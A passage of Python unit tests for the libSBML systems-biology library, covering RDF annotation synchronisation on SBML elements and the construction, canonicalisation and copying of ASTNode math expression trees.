" <vCard:Given>Nicolas</vCard:Given>\n"
+
" </vCard:N>\n"
+
" <vCard:EMAIL><EMAIL></vCard:EMAIL>\n"
+
" <vCard:ORG rdf:parseType=\"Resource\">\n"
+
" <vCard:Orgname>EMBL-EBI</vCard:Orgname>\n"
+
" </vCard:ORG>\n"
+
" </rdf:li>\n"
+
" </rdf:Bag>\n"
+
" </dc:creator>\n"
+
" <dcterms:created rdf:parseType=\"Resource\">\n"
+
" <dcterms:W3CDTF>2005-02-02T14:56:11</dcterms:W3CDTF>\n"
+
" </dcterms:created>\n"
+
" <dcterms:modified rdf:parseType=\"Resource\">\n"
+
" <dcterms:W3CDTF>2006-05-30T10:46:02</dcterms:W3CDTF>\n"
+
" </dcterms:modified>\n"
+
" <bqbiol:is>\n"
+
" <rdf:Bag>\n"
+
" <rdf:li rdf:resource=\"http://www.geneontology.org/#GO:0007274\"/>\n"
+
" </rdf:Bag>\n"
+
" </bqbiol:is>\n"
+
" </rdf:Description>\n"
+
" </rdf:RDF>\n"
+
"</annotation>")
c.setAnnotation(addedAnn)
expected = wrapString("<model metaid=\"_000005\" id=\"A\">\n"
+
" <annotation>\n"
+
" <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n"
+
" <rdf:Description rdf:about=\"#_000005\">\n"
+
" <dc:creator>\n"
+
" <rdf:Bag>\n"
+
" <rdf:li rdf:parseType=\"Resource\">\n"
+
" <vCard:N rdf:parseType=\"Resource\">\n"
+
" <vCard:Family>Le Novere</vCard:Family>\n"
+
" <vCard:Given>Nicolas</vCard:Given>\n"
+
" </vCard:N>\n"
+
" <vCard:EMAIL><EMAIL></vCard:EMAIL>\n"
+
" <vCard:ORG rdf:parseType=\"Resource\">\n"
+
" <vCard:Orgname>EMBL-EBI</vCard:Orgname>\n"
+
" </vCard:ORG>\n"
+
" </rdf:li>\n"
+
" </rdf:Bag>\n"
+
" </dc:creator>\n"
+
" <dcterms:created rdf:parseType=\"Resource\">\n"
+
" <dcterms:W3CDTF>2005-02-02T14:56:11Z</dcterms:W3CDTF>\n"
+
" </dcterms:created>\n"
+
" <dcterms:modified rdf:parseType=\"Resource\">\n"
+
" <dcterms:W3CDTF>2006-05-30T10:46:02Z</dcterms:W3CDTF>\n"
+
" </dcterms:modified>\n"
+
" <bqbiol:is>\n"
+
" <rdf:Bag>\n"
+
" <rdf:li rdf:resource=\"http://www.geneontology.org/#GO:0007274\"/>\n"
+
" </rdf:Bag>\n"
+
" </bqbiol:is>\n"
+
" </rdf:Description>\n"
+
" </rdf:RDF>\n"
+
" </annotation>\n"
+
"</model>")
self.assertEqual( True, self.equals(expected,c.toSBML()) )
pass
def test_SyncAnnotation_stringHistoryWhenNotValid(self):
c = libsbml.Compartment(2,3)
c.setMetaId("_000003")
c.setId("A")
addedAnn = wrapString("<annotation>\n"
+
" <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n"
+
" <rdf:Description rdf:about=\"#_000005\">\n"
+
" <dc:creator>\n"
+
" <rdf:Bag>\n"
+
" <rdf:li rdf:parseType=\"Resource\">\n"
+
" <vCard:N rdf:parseType=\"Resource\">\n"
+
" <vCard:Family>Le Novere</vCard:Family>\n"
+
" <vCard:Given>Nicolas</vCard:Given>\n"
+
" </vCard:N>\n"
+
" <vCard:EMAIL><EMAIL></vCard:EMAIL>\n"
+
" <vCard:ORG rdf:parseType=\"Resource\">\n"
+
" <vCard:Orgname>EMBL-EBI</vCard:Orgname>\n"
+
" </vCard:ORG>\n"
+
" </rdf:li>\n"
+
" </rdf:Bag>\n"
+
" </dc:creator>\n"
+
" <dcterms:created rdf:parseType=\"Resource\">\n"
+
" <dcterms:W3CDTF>2005-02-02T14:56:11</dcterms:W3CDTF>\n"
+
" </dcterms:created>\n"
+
" <dcterms:modified rdf:parseType=\"Resource\">\n"
+
" <dcterms:W3CDTF>2006-05-30T10:46:02</dcterms:W3CDTF>\n"
+
" </dcterms:modified>\n"
+
" <bqbiol:is>\n"
+
" <rdf:Bag>\n"
+
" <rdf:li rdf:resource=\"http://www.geneontology.org/#GO:0007274\"/>\n"
+
" </rdf:Bag>\n"
+
" </bqbiol:is>\n"
+
" </rdf:Description>\n"
+
" </rdf:RDF>\n"
+
"</annotation>")
c.setAnnotation(addedAnn)
expected = wrapString("<compartment metaid=\"_000003\" id=\"A\">\n"
+
" <annotation>\n"
+
" <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n"
+
" <rdf:Description rdf:about=\"#_000003\">\n"
+
" <bqbiol:is>\n"
+
" <rdf:Bag>\n"
+
" <rdf:li rdf:resource=\"http://www.geneontology.org/#GO:0007274\"/>\n"
+
" </rdf:Bag>\n"
+
" </bqbiol:is>\n"
+
" </rdf:Description>\n"
+
" <rdf:Description rdf:about=\"#_000005\">\n"
+
" <dc:creator>\n"
+
" <rdf:Bag>\n"
+
" <rdf:li rdf:parseType=\"Resource\">\n"
+
" <vCard:N rdf:parseType=\"Resource\">\n"
+
" <vCard:Family>Le Novere</vCard:Family>\n"
+
" <vCard:Given>Nicolas</vCard:Given>\n"
+
" </vCard:N>\n"
+
" <vCard:EMAIL><EMAIL></vCard:EMAIL>\n"
+
" <vCard:ORG rdf:parseType=\"Resource\">\n"
+
" <vCard:Orgname>EMBL-EBI</vCard:Orgname>\n"
+
" </vCard:ORG>\n"
+
" </rdf:li>\n"
+
" </rdf:Bag>\n"
+
" </dc:creator>\n"
+
" <dcterms:created rdf:parseType=\"Resource\">\n"
+
" <dcterms:W3CDTF>2005-02-02T14:56:11</dcterms:W3CDTF>\n"
+
" </dcterms:created>\n"
+
" <dcterms:modified rdf:parseType=\"Resource\">\n"
+
" <dcterms:W3CDTF>2006-05-30T10:46:02</dcterms:W3CDTF>\n"
+
" </dcterms:modified>\n"
+
" </rdf:Description>\n"
+
" </rdf:RDF>\n"
+
" </annotation>\n"
+
"</compartment>")
self.assertEqual( True, self.equals(expected,c.toSBML()) )
pass
def suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(TestSyncAnnotation))
return suite
if __name__ == "__main__":
if unittest.TextTestRunner(verbosity=1).run(suite()).wasSuccessful() :
sys.exit(0)
else:
sys.exit(1)
```
#### File: test/math/TestASTNode.py
```python
import sys
import unittest
import libsbml
DBL_EPSILON = 2.2204460492503131e-16
class TestASTNode(unittest.TestCase):
def test_ASTNode_addChild1(self):
node = libsbml.ASTNode()
c1 = libsbml.ASTNode()
c2 = libsbml.ASTNode()
c1_1 = libsbml.ASTNode()
i = 0
node.setType(libsbml.AST_LOGICAL_AND)
c1.setName( "a")
c2.setName( "b")
node.addChild(c1)
node.addChild(c2)
self.assert_( node.getNumChildren() == 2 )
self.assert_(( "and(a, b)" == libsbml.formulaToString(node) ))
c1_1.setName( "d")
i = node.addChild(c1_1)
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assert_( node.getNumChildren() == 3 )
self.assert_(( "and(a, b, d)" == libsbml.formulaToString(node) ))
self.assert_(( "a" == node.getChild(0).getName() ))
self.assert_(( "b" == node.getChild(1).getName() ))
self.assert_(( "d" == node.getChild(2).getName() ))
_dummyList = [ node ]; _dummyList[:] = []; del _dummyList
pass
def test_ASTNode_addSemanticsAnnotation(self):
ann = libsbml.XMLNode()
node = libsbml.ASTNode()
i = 0
i = node.addSemanticsAnnotation(ann)
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assert_( node.getNumSemanticsAnnotations() == 1 )
i = node.addSemanticsAnnotation(None)
self.assert_( i == libsbml.LIBSBML_OPERATION_FAILED )
self.assert_( node.getNumSemanticsAnnotations() == 1 )
_dummyList = [ node ]; _dummyList[:] = []; del _dummyList
pass
def test_ASTNode_avogadro(self):
n = libsbml.ASTNode()
n.setType(libsbml.AST_NAME_AVOGADRO)
n.setName( "NA")
self.assert_(( "NA" == n.getName() ))
val = n.getReal()
self.assert_( val == 6.02214179e23 )
self.assert_( n.isConstant() == 1 )
_dummyList = [ n ]; _dummyList[:] = []; del _dummyList
pass
def test_ASTNode_avogadro_bug(self):
n = libsbml.ASTNode()
n.setName( "NA")
n.setType(libsbml.AST_NAME_AVOGADRO)
self.assert_(( "NA" == n.getName() ))
val = n.getReal()
self.assert_( val == 6.02214179e23 )
self.assert_( n.isConstant() == 1 )
_dummyList = [ n ]; _dummyList[:] = []; del _dummyList
pass
def test_ASTNode_canonicalizeConstants(self):
n = libsbml.ASTNode()
n.setName( "ExponentialE")
self.assertEqual( True, n.isName() )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_CONSTANT_E )
n.setType(libsbml.AST_NAME)
n.setName( "False")
self.assertEqual( True, n.isName() )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_CONSTANT_FALSE )
n.setType(libsbml.AST_NAME)
n.setName( "Pi")
self.assertEqual( True, n.isName() )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_CONSTANT_PI )
n.setType(libsbml.AST_NAME)
n.setName( "True")
self.assertEqual( True, n.isName() )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_CONSTANT_TRUE )
n.setType(libsbml.AST_NAME)
n.setName( "Foo")
self.assertEqual( True, n.isName() )
n.canonicalize()
self.assertEqual( True, n.isName() )
_dummyList = [ n ]; _dummyList[:] = []; del _dummyList
pass
def test_ASTNode_canonicalizeFunctions(self):
n = libsbml.ASTNode(libsbml.AST_FUNCTION)
n.setName( "abs")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_FUNCTION_ABS )
n.setType(libsbml.AST_FUNCTION)
n.setName( "arccos")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_FUNCTION_ARCCOS )
n.setType(libsbml.AST_FUNCTION)
n.setName( "arccosh")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_FUNCTION_ARCCOSH )
n.setType(libsbml.AST_FUNCTION)
n.setName( "arccot")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_FUNCTION_ARCCOT )
n.setType(libsbml.AST_FUNCTION)
n.setName( "arccoth")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_FUNCTION_ARCCOTH )
n.setType(libsbml.AST_FUNCTION)
n.setName( "arccsc")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_FUNCTION_ARCCSC )
n.setType(libsbml.AST_FUNCTION)
n.setName( "arccsch")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_FUNCTION_ARCCSCH )
n.setType(libsbml.AST_FUNCTION)
n.setName( "arcsec")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_FUNCTION_ARCSEC )
n.setType(libsbml.AST_FUNCTION)
n.setName( "arcsech")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_FUNCTION_ARCSECH )
n.setType(libsbml.AST_FUNCTION)
n.setName( "arcsin")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_FUNCTION_ARCSIN )
n.setType(libsbml.AST_FUNCTION)
n.setName( "arcsinh")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_FUNCTION_ARCSINH )
n.setType(libsbml.AST_FUNCTION)
n.setName( "arctan")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_FUNCTION_ARCTAN )
n.setType(libsbml.AST_FUNCTION)
n.setName( "arctanh")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_FUNCTION_ARCTANH )
n.setType(libsbml.AST_FUNCTION)
n.setName( "ceiling")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_FUNCTION_CEILING )
n.setType(libsbml.AST_FUNCTION)
n.setName( "cos")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_FUNCTION_COS )
n.setType(libsbml.AST_FUNCTION)
n.setName( "cosh")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_FUNCTION_COSH )
n.setType(libsbml.AST_FUNCTION)
n.setName( "cot")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_FUNCTION_COT )
n.setType(libsbml.AST_FUNCTION)
n.setName( "coth")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_FUNCTION_COTH )
n.setType(libsbml.AST_FUNCTION)
n.setName( "csc")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_FUNCTION_CSC )
n.setType(libsbml.AST_FUNCTION)
n.setName( "csch")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_FUNCTION_CSCH )
n.setType(libsbml.AST_FUNCTION)
n.setName( "exp")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_FUNCTION_EXP )
n.setType(libsbml.AST_FUNCTION)
n.setName( "factorial")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_FUNCTION_FACTORIAL )
n.setType(libsbml.AST_FUNCTION)
n.setName( "floor")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_FUNCTION_FLOOR )
n.setType(libsbml.AST_FUNCTION)
n.setName( "lambda")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_LAMBDA )
n.setType(libsbml.AST_FUNCTION)
n.setName( "ln")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_FUNCTION_LN )
n.setType(libsbml.AST_FUNCTION)
n.setName( "log")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_FUNCTION_LOG )
n.setType(libsbml.AST_FUNCTION)
n.setName( "piecewise")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_FUNCTION_PIECEWISE )
n.setType(libsbml.AST_FUNCTION)
n.setName( "power")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_FUNCTION_POWER )
n.setType(libsbml.AST_FUNCTION)
n.setName( "root")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_FUNCTION_ROOT )
n.setType(libsbml.AST_FUNCTION)
n.setName( "sec")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_FUNCTION_SEC )
n.setType(libsbml.AST_FUNCTION)
n.setName( "sech")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_FUNCTION_SECH )
n.setType(libsbml.AST_FUNCTION)
n.setName( "sin")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_FUNCTION_SIN )
n.setType(libsbml.AST_FUNCTION)
n.setName( "sinh")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_FUNCTION_SINH )
n.setType(libsbml.AST_FUNCTION)
n.setName( "tan")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_FUNCTION_TAN )
n.setType(libsbml.AST_FUNCTION)
n.setName( "tanh")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_FUNCTION_TANH )
n.setType(libsbml.AST_FUNCTION)
n.setName( "Foo")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_FUNCTION )
_dummyList = [ n ]; _dummyList[:] = []; del _dummyList
pass
def test_ASTNode_canonicalizeFunctionsL1(self):
n = libsbml.ASTNode(libsbml.AST_FUNCTION)
n.setName( "acos")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_FUNCTION_ARCCOS )
n.setType(libsbml.AST_FUNCTION)
n.setName( "asin")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_FUNCTION_ARCSIN )
n.setType(libsbml.AST_FUNCTION)
n.setName( "atan")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_FUNCTION_ARCTAN )
n.setType(libsbml.AST_FUNCTION)
n.setName( "ceil")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_FUNCTION_CEILING )
n.setType(libsbml.AST_FUNCTION)
n.setName( "pow")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_FUNCTION_POWER )
_dummyList = [ n ]; _dummyList[:] = []; del _dummyList
n = libsbml.ASTNode(libsbml.AST_FUNCTION)
n.setName( "log")
c = libsbml.ASTNode()
c.setName( "x")
n.addChild(c)
self.assert_( n.getType() == libsbml.AST_FUNCTION )
self.assert_( n.getNumChildren() == 1 )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_FUNCTION_LN )
self.assert_( n.getNumChildren() == 1 )
n.setType(libsbml.AST_FUNCTION)
c = libsbml.ASTNode()
c.setName( "y")
n.addChild(c)
self.assert_( n.getType() == libsbml.AST_FUNCTION )
self.assert_( n.getNumChildren() == 2 )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_FUNCTION_LOG )
_dummyList = [ n ]; _dummyList[:] = []; del _dummyList
n = libsbml.ASTNode(libsbml.AST_FUNCTION)
n.setName( "log10")
c = libsbml.ASTNode()
c.setName( "x")
n.addChild(c)
self.assert_( n.getType() == libsbml.AST_FUNCTION )
self.assert_( n.getNumChildren() == 1 )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_FUNCTION_LOG )
self.assert_( n.getNumChildren() == 2 )
c = n.getLeftChild()
self.assert_( c.getType() == libsbml.AST_INTEGER )
self.assert_( c.getInteger() == 10 )
c = n.getRightChild()
self.assert_( c.getType() == libsbml.AST_NAME )
self.assert_(( "x" == c.getName() ))
_dummyList = [ n ]; _dummyList[:] = []; del _dummyList
n = libsbml.ASTNode(libsbml.AST_FUNCTION)
n.setName( "sqr")
c = libsbml.ASTNode()
c.setName( "x")
n.addChild(c)
self.assert_( n.getType() == libsbml.AST_FUNCTION )
self.assert_( n.getNumChildren() == 1 )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_FUNCTION_POWER )
self.assert_( n.getNumChildren() == 2 )
c = n.getLeftChild()
self.assert_( c.getType() == libsbml.AST_NAME )
self.assert_(( "x" == c.getName() ))
c = n.getRightChild()
self.assert_( c.getType() == libsbml.AST_INTEGER )
self.assert_( c.getInteger() == 2 )
_dummyList = [ n ]; _dummyList[:] = []; del _dummyList
n = libsbml.ASTNode(libsbml.AST_FUNCTION)
n.setName( "sqrt")
c = libsbml.ASTNode()
c.setName( "x")
n.addChild(c)
self.assert_( n.getType() == libsbml.AST_FUNCTION )
self.assert_( n.getNumChildren() == 1 )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_FUNCTION_ROOT )
self.assert_( n.getNumChildren() == 2 )
c = n.getLeftChild()
self.assert_( c.getType() == libsbml.AST_INTEGER )
self.assert_( c.getInteger() == 2 )
c = n.getRightChild()
self.assert_( c.getType() == libsbml.AST_NAME )
self.assert_(( "x" == c.getName() ))
_dummyList = [ n ]; _dummyList[:] = []; del _dummyList
pass
def test_ASTNode_canonicalizeLogical(self):
n = libsbml.ASTNode(libsbml.AST_FUNCTION)
n.setName( "and")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_LOGICAL_AND )
n.setType(libsbml.AST_FUNCTION)
n.setName( "not")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_LOGICAL_NOT )
n.setType(libsbml.AST_FUNCTION)
n.setName( "or")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_LOGICAL_OR )
n.setType(libsbml.AST_FUNCTION)
n.setName( "xor")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_LOGICAL_XOR )
n.setType(libsbml.AST_FUNCTION)
_dummyList = [ n ]; _dummyList[:] = []; del _dummyList
pass
def test_ASTNode_canonicalizeRelational(self):
n = libsbml.ASTNode(libsbml.AST_FUNCTION)
n.setName( "eq")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_RELATIONAL_EQ )
n.setType(libsbml.AST_FUNCTION)
n.setName( "geq")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_RELATIONAL_GEQ )
n.setType(libsbml.AST_FUNCTION)
n.setName( "gt")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_RELATIONAL_GT )
n.setType(libsbml.AST_FUNCTION)
n.setName( "leq")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_RELATIONAL_LEQ )
n.setType(libsbml.AST_FUNCTION)
n.setName( "lt")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_RELATIONAL_LT )
n.setType(libsbml.AST_FUNCTION)
n.setName( "neq")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_RELATIONAL_NEQ )
n.setType(libsbml.AST_FUNCTION)
_dummyList = [ n ]; _dummyList[:] = []; del _dummyList
pass
def test_ASTNode_children(self):
parent = libsbml.ASTNode()
left = libsbml.ASTNode()
right = libsbml.ASTNode()
right2 = libsbml.ASTNode()
parent.setType(libsbml.AST_PLUS)
left.setValue(1)
right.setValue(2)
right2.setValue(3)
parent.addChild(left)
parent.addChild(right)
self.assert_( parent.getNumChildren() == 2 )
self.assert_( left.getNumChildren() == 0 )
self.assert_( right.getNumChildren() == 0 )
self.assert_( parent.getLeftChild() == left )
self.assert_( parent.getRightChild() == right )
self.assert_( parent.getChild(0) == left )
self.assert_( parent.getChild(1) == right )
self.assert_( parent.getChild(2) == None )
parent.addChild(right2)
self.assert_( parent.getNumChildren() == 3 )
self.assert_( left.getNumChildren() == 0 )
self.assert_( right.getNumChildren() == 0 )
self.assert_( right2.getNumChildren() == 0 )
self.assert_( parent.getLeftChild() == left )
self.assert_( parent.getRightChild() == right2 )
self.assert_( parent.getChild(0) == left )
self.assert_( parent.getChild(1) == right )
self.assert_( parent.getChild(2) == right2 )
self.assert_( parent.getChild(3) == None )
_dummyList = [ parent ]; _dummyList[:] = []; del _dummyList
pass
def test_ASTNode_create(self):
n = libsbml.ASTNode()
ea = libsbml.EventAssignment(2,4)
self.assert_( n.getType() == libsbml.AST_UNKNOWN )
self.assert_( n.getCharacter() == "\0" )
self.assert_( n.getName() == None )
self.assert_( n.getInteger() == 0 )
self.assert_( n.getExponent() == 0 )
self.assert_( n.getNumChildren() == 0 )
self.assert_( n.getParentSBMLObject() == None )
_dummyList = [ ea ]; _dummyList[:] = []; del _dummyList
_dummyList = [ n ]; _dummyList[:] = []; del _dummyList
pass
def test_ASTNode_deepCopy_1(self):
node = libsbml.ASTNode()
node.setCharacter( '+')
node.addChild(libsbml.ASTNode())
node.addChild(libsbml.ASTNode())
node.getLeftChild().setValue(1)
node.getRightChild().setValue(2)
self.assert_( node.getType() == libsbml.AST_PLUS )
self.assert_( node.getCharacter() == '+' )
self.assert_( node.getNumChildren() == 2 )
child = node.getLeftChild()
self.assert_( child.getType() == libsbml.AST_INTEGER )
self.assert_( child.getInteger() == 1 )
self.assert_( child.getNumChildren() == 0 )
child = node.getRightChild()
self.assert_( child.getType() == libsbml.AST_INTEGER )
self.assert_( child.getInteger() == 2 )
self.assert_( child.getNumChildren() == 0 )
copy = node.deepCopy()
self.assert_( copy != node )
self.assert_( copy.getType() == libsbml.AST_PLUS )
self.assert_( copy.getCharacter() == '+' )
self.assert_( copy.getNumChildren() == 2 )
child = copy.getLeftChild()
self.assert_( child != node.getLeftChild() )
self.assert_( child.getType() == libsbml.AST_INTEGER )
self.assert_( child.getInteger() == 1 )
self.assert_( child.getNumChildren() == 0 )
child = copy.getRightChild()
self.assert_( child != node.getRightChild() )
self.assert_( child.getType() == libsbml.AST_INTEGER )
self.assert_( child.getInteger() == 2 )
self.assert_( child.getNumChildren() == 0 )
_dummyList = [ node ]; _dummyList[:] = []; del _dummyList
_dummyList = [ copy ]; _dummyList[:] = []; del _dummyList
pass
def test_ASTNode_deepCopy_2(self):
node = libsbml.ASTNode()
node.setName( "Foo")
self.assert_( node.getType() == libsbml.AST_NAME )
self.assert_(( "Foo" == node.getName() ))
self.assert_( node.getNumChildren() == 0 )
copy = node.deepCopy()
self.assert_( copy != node )
self.assert_( copy.getType() == libsbml.AST_NAME )
self.assert_(( "Foo" == copy.getName() ))
self.assert_( copy.getNumChildren() == 0 )
_dummyList = [ node ]; _dummyList[:] = []; del _dummyList
_dummyList = [ copy ]; _dummyList[:] = []; del _dummyList
pass
def test_ASTNode_deepCopy_3(self):
node = libsbml.ASTNode(libsbml.AST_FUNCTION)
node.setName( "Foo")
self.assert_( node.getType() == libsbml.AST_FUNCTION )
self.assert_(( "Foo" == node.getName() ))
self.assert_( node.getNumChildren() == 0 )
copy = node.deepCopy()
self.assert_( copy != node )
self.assert_( copy.getType() == libsbml.AST_FUNCTION )
self.assert_(( "Foo" == copy.getName() ))
self.assert_( copy.getNumChildren() == 0 )
_dummyList = [ node ]; _dummyList[:] = []; del _dummyList
_dummyList = [ copy ]; _dummyList[:] = []; del _dummyList
pass
def test_ASTNode_deepCopy_4(self):
node = libsbml.ASTNode(libsbml.AST_FUNCTION_ABS)
node.setName( "ABS")
self.assert_( node.getType() == libsbml.AST_FUNCTION_ABS )
self.assert_(( "ABS" == node.getName() ))
self.assert_( node.getNumChildren() == 0 )
copy = node.deepCopy()
self.assert_( copy != node )
self.assert_( copy.getType() == libsbml.AST_FUNCTION_ABS )
self.assert_(( "ABS" == copy.getName() ))
self.assert_( copy.getNumChildren() == 0 )
_dummyList = [ node ]; _dummyList[:] = []; del _dummyList
_dummyList = [ copy ]; _dummyList[:] = []; del _dummyList
pass
def test_ASTNode_freeName(self):
node = libsbml.ASTNode()
i = 0
i = node.setName( "a")
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assert_(( "a" == libsbml.formulaToString(node) ))
self.assert_(( "a" == node.getName() ))
i = node.freeName()
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assert_( node.getName() == None )
i = node.freeName()
self.assert_( i == libsbml.LIBSBML_UNEXPECTED_ATTRIBUTE )
self.assert_( node.getName() == None )
node.setType(libsbml.AST_UNKNOWN)
i = node.freeName()
self.assert_( i == libsbml.LIBSBML_UNEXPECTED_ATTRIBUTE )
self.assert_( node.getName() == None )
_dummyList = [ node ]; _dummyList[:] = []; del _dummyList
pass
def test_ASTNode_free_NULL(self):
_dummyList = [ None ]; _dummyList[:] = []; del _dummyList
pass
def test_ASTNode_getName(self):
n = libsbml.ASTNode()
n.setName( "foo")
self.assert_(( "foo" == n.getName() ))
n.setType(libsbml.AST_NAME_TIME)
self.assert_(( "foo" == n.getName() ))
n.setName(None)
self.assert_( n.getName() == None )
n.setType(libsbml.AST_CONSTANT_E)
self.assert_(( "exponentiale" == n.getName() ))
n.setType(libsbml.AST_CONSTANT_FALSE)
